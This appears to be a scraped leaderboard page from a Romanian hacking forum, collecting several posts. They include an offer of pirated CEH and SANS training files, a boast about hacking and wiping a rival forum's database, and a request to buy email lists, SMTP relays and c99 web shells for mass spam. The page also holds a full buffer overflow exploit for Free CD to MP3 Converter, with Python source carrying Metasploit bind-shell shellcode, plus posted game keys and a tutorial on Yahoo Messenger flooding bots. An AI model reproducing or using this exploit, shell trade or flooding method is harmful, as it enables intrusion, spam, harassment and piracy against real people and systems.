Leaderboard
Popular Content
Showing content with the highest reputation on 09/09/11 in all areas
-
Am pe un FTP astea> 1. CEH v7 - Video How To use tools and setup lab required for CEH Practice 14,2 GB More info: CEHv7 Course Outline Version 7 : 1. Introduction to Ethical Hacking 2. Footprinting and Reconnaissance 3. Scanning Networks 4. Enumeration 5. System Hacking 6. Trojans and backdoors 7. Viruses and Worms 8. Sniffers 9. Social Engineering 10. Denial of Service 11. Session Hijacking 12. Hacking Webservers 13. Hacking Web Applications 14. SQL Injection 15. Hacking Wireless Networks 16. Evading IDS, Firewalls and Honeypots 17. buffer Overflows 18. Cryptography 19. Penetration Testing. CEH 7 Video Howto: CEH 7 Hacking Tool: CEH v7 Instructor Slides_VeriSign Encrypted Sig CEHv7 Lab Prerequisites CEHv7 - Module 02 - Footprinting and Reconnaissance CEHv7 - Module 03 - Scanning Networks CEHv7 - Module 04 - Enumeration CEHv7 - Module 05 - System Hacking CEHv7 - Module 06 - Trojans and backdoors CEHv7 - Module 07 - Viruses and Worms CEHv7 - Module 08 - Sniffers CEHv7 - Module 09 - Social Engineering CEHv7 - Module 10 - Denial of Service CEHv7 - Module 11 - Session Hijacking CEHv7 - Module 12 - Hacking Webserver CEHv7 - Module 13 - Hacking Web Applications CEHv7 - Module 14 - SQL Injection CEHv7 - Module 15 - Hacking Wireless Networks CEHv7 - Module 16 - Evading IDS, Firewalls and Honeypots CEHv7 - Module 17 - buffer Overflows CEHv7 - Module 18 - Cryptography CEHv7 - Module 19 - Penetration Testing 2. CEH v7 - Instructor Slides (Unencrypted) 253 MB CEHv7 Module 01 Introduction to Ethical Hacking.pdf CEHv7 Module 02 Footprinting and Reconnaissance.pdf CEHv7 Module 03 Scanning Networks.pdf CEHv7 Module 04 Enumeration.pdf CEHv7 Module 05 System Hacking.pdf CEHv7 Module 06 Trojans and Backdoors.pdf CEHv7 Module 07 Viruses and Worms.pdf CEHv7 Module 08 Sniffers.pdf CEHv7 Module 09 Social Engineering.pdf CEHv7 Module 10 Denial of Service.pdf CEHv7 Module 11 Session Hijacking.pdf CEHv7 Module 12 Hacking Webservers.pdf CEHv7 Module 13 Hacking Web Applications.pdf CEHv7 Module 14 SQL Injection.pdf CEHv7 Module 15 Hacking Wireless Networks.pdf CEHv7 Module 16 Evading IDS, Firewalls, and Honeypots.pdf CEHv7 Module 17 Buffer Overflow.pdf CEHv7 Module 18 Cryptography.pdf CEHv7 Module 19 Penetration Testing.pdf 3. SANS Security 504 - Hacker Techniques, Exploits & Incident Handling 670 MB SANS: Hacker Techniques, Exploits & Incident Handling PM pt usr/psw postacii de meserie sa nu ceara...1 point
-
Fraierul asta avea un forum akn.ro, l-am hackuit, i-am sters baza de date si s-a rugat de mine doua saptamani sa ii dau baza de date si acuma e mare smecher Are id-ul anak1n_07 succes la flood-1 points
-
Salutare, Caut sa cumpar mail-uri de RO, persoane din orice oras, cu varsta 18+; cu cat mai multe, cu atat mai bine. Ma intereseaza sa fie active, nu conteaza daca au mai fost spamate. Mai caut SMTP-uri si c99 pe host-uri care au functia mail() activa. SMTP-urile si shell-urile le vreau fresh ca mail-urile sa-mi intre in inbox. Ambele sa duca minim 3k mail-uri dintr-un foc. Doresc sa colaborez cu persoane care cunosc limba romana si care sa aiba ok-ul din partea moderatorilor / comunitatii. Vreau sa lansez un spam masiv cu mesaje nationaliste care sa trezeasca interesul, catusi de putin, romanilor inlantuiti de lucrurile cotidiene lipsite de valoare in vremurile rusinoase pe care le traim, unde umilinta si bataile de joc isi fac jocul zi de zi. Daca sunt doritori care vor ia parte la miscare, ii rog sa ma contacteze prin PM. Cei care vor sa-mi vanda cele dorite, ii rog sa dea reply. Multumesc.-1 points
-
[+]Written By D4rk357 [+]Special thanks to Peter Van Eckhoutte for his awesome Exploit writing series . [+]Thanks to Fb1h2s for helping me out in the way [+]garage4hackers In this tutorial i will start from scratch and build a working exploit. A public exploit for this is already available here Free CD to MP3 Converter 3.1 Buffer Overflow Exploit First step is downloading and installing the vulnerable application from here Application Install Immunity Debugger or ollydbg or windbg anyone of it would do . Now we will write a simple python code which will generate a .wav file and test the application against it . handle=open("crash.wav","a") Crap="\x41"*30000 handle.write(Crap) This little code upon execution will generate a file with the name of crash.wav Open the debugger of your choice in my case immunity debugger . Open the Executable of CD to MP3 converter and then click on execute. Open: Execute: Now open your Crash.wav file in CD to MP3 converter in option wav to wav converter and BOOM the application Dies instantly . NOw check your Debugger for what exactly happened . Woot Woot Eip has been overwritten . Not only EIP but a few more registers have been overwritten thus increasing our chance to make a Working exploit for this vulnerability. Now The next step is to determine the Exact position at which EIP is overwritten . For that We will use a couple of tools which comes with metasploit . On windows Platform Open Cygwin and then browse to tools directory of metasploit. Once inside it execute pattern_create.rb script which generates unique characters of whichever size you want . By reducing the size of crap again and again in my script and getting a crash i figured it out a string of 5000 unique characters will be more than enough. Syntax: ./pattern_create.rb 5000 once the pattern is created copy it and put it in place of Crap . Now Execute the application from debugger again and put in the newly generated Crash.wav(Delete previous Crash.wav file before doing it as i am opening the file in append mode). Check the Debugger again and you can see some numbers in the EIP which in my case is 31684630 Now in Cygwin Shell we will run pattern_offset to check where exactly EIP is being overwritten . Syntax: ./pattern_offset.rb 31684630 5000 And the location it gives me is 4112 great. So Just to Cross Check that the position of EIP given by the tool is correct we will write a small script . handle=open("crash.wav","a") Crap="\x41"*4112 Eip="\x42"*4 handle.write(Crap) Again open the program through immunity debugger Execute it . After the application crashes check the Eip and you find there 42424242 which means the address found by the tool is perfect . Now we have to find the location of a command in dll file which calls/goes to esp like jmp esp etc. Now we will load the the application again in debugger and search jmp esp command in every dll that is being loaded .( In immunity debugger we can take a look at executable module screen and double click on each dll that is being loaded and then search for the specific command in that address space. After some tinkering out we will find that the dll winmm.dll has a jmp esp command at 76B43ADC Great now we have almost everything we need to make a workable exploit . the address 76 B4 3A DC will be mentioned as \xDC \x3A \xB4 \x76 since we are passing it as a string to EIP . We will use win32 bind shell provided by metasploit encoded in alpha2 encoder We will add some NOPS ( no operation bytes) before starting our shellcode because generally some bytes at the starting are not interpreted by processor as command so it could cause our exploit to fail . Adding Nops would increase the reliability of exploit . And we get a telnet connection \m/ [P.S] You will have to write your own exploit(modify EIP) as i used a hard coded address Dont Try Post Mortem degubbing .. Debugger is not catching it ( Atleast in my computer) P.S here's the source Code: handle=open("final.wav","a") Crap="\x41"*4112 Eip="\xDC\x3A\xB4\x76" # win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com ShellCode=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x43" "\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x53\x32\x41\x42\x41\x32" "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x62" "\x4a\x48\x6b\x70\x4d\x38\x68\x6c\x39\x4b\x4f\x79\x6f\x6b\x4f\x73" "\x50\x4c\x4b\x72\x4c\x46\x44\x57\x54\x4e\x6b\x31\x55\x67\x4c\x4e" "\x6b\x63\x4c\x34\x45\x62\x58\x46\x61\x48\x6f\x4e\x6b\x50\x4f\x44" "\x58\x6c\x4b\x51\x4f\x45\x70\x44\x41\x6a\x4b\x70\x49\x6e\x6b\x35" "\x64\x4c\x4b\x53\x31\x78\x6e\x75\x61\x6b\x70\x4f\x69\x6e\x4c\x4b" "\x34\x4f\x30\x53\x44\x57\x77\x6f\x31\x4b\x7a\x74\x4d\x75\x51\x69" "\x52\x68\x6b\x48\x74\x57\x4b\x70\x54\x64\x64\x47\x58\x50\x75\x6d" "\x35\x4c\x4b\x31\x4f\x36\x44\x56\x61\x78\x6b\x63\x56\x6c\x4b\x54" "\x4c\x70\x4b\x4e\x6b\x53\x6f\x75\x4c\x47\x71\x5a\x4b\x63\x33\x54" "\x6c\x4e\x6b\x6b\x39\x30\x6c\x44\x64\x35\x4c\x71\x71\x5a\x63\x34" "\x71\x6b\x6b\x72\x44\x6c\x4b\x37\x33\x76\x50\x4e\x6b\x71\x50\x56" "\x6c\x6c\x4b\x44\x30\x65\x4c\x4c\x6d\x4c\x4b\x77\x30\x35\x58\x61" "\x4e\x62\x48\x6c\x4e\x62\x6e\x44\x4e\x38\x6c\x50\x50\x4b\x4f\x5a" "\x76\x45\x36\x70\x53\x41\x76\x32\x48\x70\x33\x56\x52\x45\x38\x42" "\x57\x72\x53\x34\x72\x63\x6f\x72\x74\x6b\x4f\x78\x50\x72\x48\x38" "\x4b\x58\x6d\x6b\x4c\x65\x6b\x42\x70\x49\x6f\x69\x46\x71\x4f\x6c" "\x49\x6a\x45\x65\x36\x4f\x71\x4a\x4d\x35\x58\x53\x32\x50\x55\x32" "\x4a\x35\x52\x49\x6f\x48\x50\x31\x78\x7a\x79\x36\x69\x4c\x35\x6c" "\x6d\x70\x57\x39\x6f\x6e\x36\x70\x53\x32\x73\x62\x73\x56\x33\x52" "\x73\x73\x73\x52\x73\x33\x73\x30\x53\x6b\x4f\x4a\x70\x35\x36\x75" "\x38\x52\x31\x41\x4c\x61\x76\x50\x53\x4d\x59\x4d\x31\x4d\x45\x55" "\x38\x69\x34\x56\x7a\x42\x50\x5a\x67\x36\x37\x79\x6f\x7a\x76\x61" "\x7a\x76\x70\x66\x31\x73\x65\x39\x6f\x68\x50\x41\x78\x4d\x74\x4e" "\x4d\x76\x4e\x68\x69\x42\x77\x79\x6f\x59\x46\x36\x33\x66\x35\x69" "\x6f\x6e\x30\x45\x38\x4b\x55\x51\x59\x6f\x76\x72\x69\x42\x77\x6b" "\x4f\x4a\x76\x70\x50\x46\x34\x36\x34\x53\x65\x79\x6f\x6e\x30\x6c" "\x53\x65\x38\x4b\x57\x70\x79\x5a\x66\x52\x59\x30\x57\x69\x6f\x6a" "\x76\x30\x55\x59\x6f\x6e\x30\x70\x66\x70\x6a\x53\x54\x72\x46\x62" "\x48\x65\x33\x50\x6d\x6c\x49\x4d\x35\x31\x7a\x52\x70\x70\x59\x44" "\x69\x7a\x6c\x4c\x49\x69\x77\x51\x7a\x71\x54\x4f\x79\x4b\x52\x34" "\x71\x39\x50\x4c\x33\x4d\x7a\x6b\x4e\x71\x52\x44\x6d\x6b\x4e\x37" "\x32\x54\x6c\x4e\x73\x4e\x6d\x33\x4a\x56\x58\x6c\x6b\x6c\x6b\x6e" "\x4b\x53\x58\x64\x32\x69\x6e\x6c\x73\x44\x56\x6b\x4f\x73\x45\x47" "\x34\x4b\x4f\x79\x46\x33\x6b\x42\x77\x73\x62\x30\x51\x73\x61\x72" "\x71\x62\x4a\x33\x31\x42\x71\x50\x51\x72\x75\x50\x51\x49\x6f\x78" "\x50\x71\x78\x4e\x4d\x39\x49\x75\x55\x6a\x6e\x70\x53\x4b\x4f\x59" "\x46\x32\x4a\x4b\x4f\x49\x6f\x56\x57\x69\x6f\x5a\x70\x4e\x6b\x33" "\x67\x49\x6c\x6d\x53\x39\x54\x55\x34\x39\x6f\x4b\x66\x31\x42\x69" "\x6f\x4a\x70\x62\x48\x78\x70\x4d\x5a\x35\x54\x63\x6f\x70\x53\x39" "\x6f\x4e\x36\x39\x6f\x38\x50\x43") nops="\x90"*50 handle.write(Crap+Eip+nops+ShellCode) #Sursa: aici.-1 points
-
6797-8wpx-7847-67rz n3et2-ltb38-9zh65 ehzp0-0bzy8-hrl4z rzvge-i0r2t-7jrzh vc7jy-vdtem-pbt9e + BONUS !!! W2PIM-F7WZD-AM5M4 4ZAYL-4GMVM-GTGTQ + BONUS !!! Leam testat inainte sa le pun aici ( detin si eu jocul ) HAI LA CAT E CALDE!!! Rep+-1 points
-
http://www.multiupload.com/7QZZ6NG7UK NoVirusThanks:http://vscan.novirusthanks.org/analysis/044ee30e077b7a21b4f3e0cecdc3d61c/a2VyaW5jaS1leGU=/-1 points
-
[+] Am vazut ca majoritatea userilor noi care apar pe forum cauta asta si am vazut ca mai este un topic in care toti scriu si nu le raspunde nimeni la intrebari si mai mult de atat buti nu sunt buni ceea ce ii face pe ei sa creada ca programul nu e bun. O sa fac eu sa zicem "tutorialul" acesta pentru userii care nu stiu ce au de facut. [+] Pentru inceput avem nevoie de o arhiva cu cateva "floodere" (sunt cele pe care le folosesc si eu ) Arhiva contine 3 foldere : - Flooderi - IR IDMakerV3.2 - Multi Yahoo Boots Checker La Flooderi sunt programele , La IR IDMaker V3.2 este un program cu care puteati realiza buti foarte usor ,si la Multi Yahoo Boots Checker se afla un program cu care puteti scana lista voastra de buti si sa salvati buti care mai merg si sa scapati de cei care numai merg. [+] Intrati la Flooderi si deschideti pe rand doar : -Big Killer Release -Fusion Ym v2 -GMC Booters Restul de 2 le lasati acolo pentru ca nu merg si mi-a fost lene sa le sterg..^^ La toate cele 3 programe o sa vedeti ca va apare Load la fiecare dintre ele. Dati la Load pe rand la fiecare si selectati fisierul .txt din folderul Flooderi numit dEv1L Boots buni. Faceti la fel la toate si dupaia dati la toate log in. Asteptati putin sa se incarce toate . O sa ia ceva timp sa se incarce..Nu mult.Cam 45 de secunde . Dupa ce s-au incarcat buti bagati idiul acolo la Victim si dati in felul urmator. La Big Killer Release dati Flood ,la Fusion Ym dati Fast YM Flood iar la Gmc booters dati Boot 1. Acum victima va fi scoasa de pe mess.Nu dureaza foarte mult ..depinde de viteza netului. [+]Cam asta e tot ca sa flodati pe cineva. [+]Ca sa creati buti faceti in felul urmator : Intrati in arhiva IR IDMakerV3.2 Intrati in IR IDMaker . Cand ati intrat in el bifati : -Random Boot name -Randomize Name and Lastname -Randomize information Si apasati butonul start. Acum v-a aparut codul captcha in dreapta pe care va trebui sa il scrieti in stanga butonului Create..Dupa fiecaredata cand scrieti codul apasati pe Create.Si un boot se va creea. Dupa dati Save si veti putea salva buti creati unde vreti. [+] Daca "tutorialul" meu v-a fost de ajutor apasati pe butonul REP de sub avatarul meu. Sper ca am fost de folos noilor membri care cautau asta.-1 points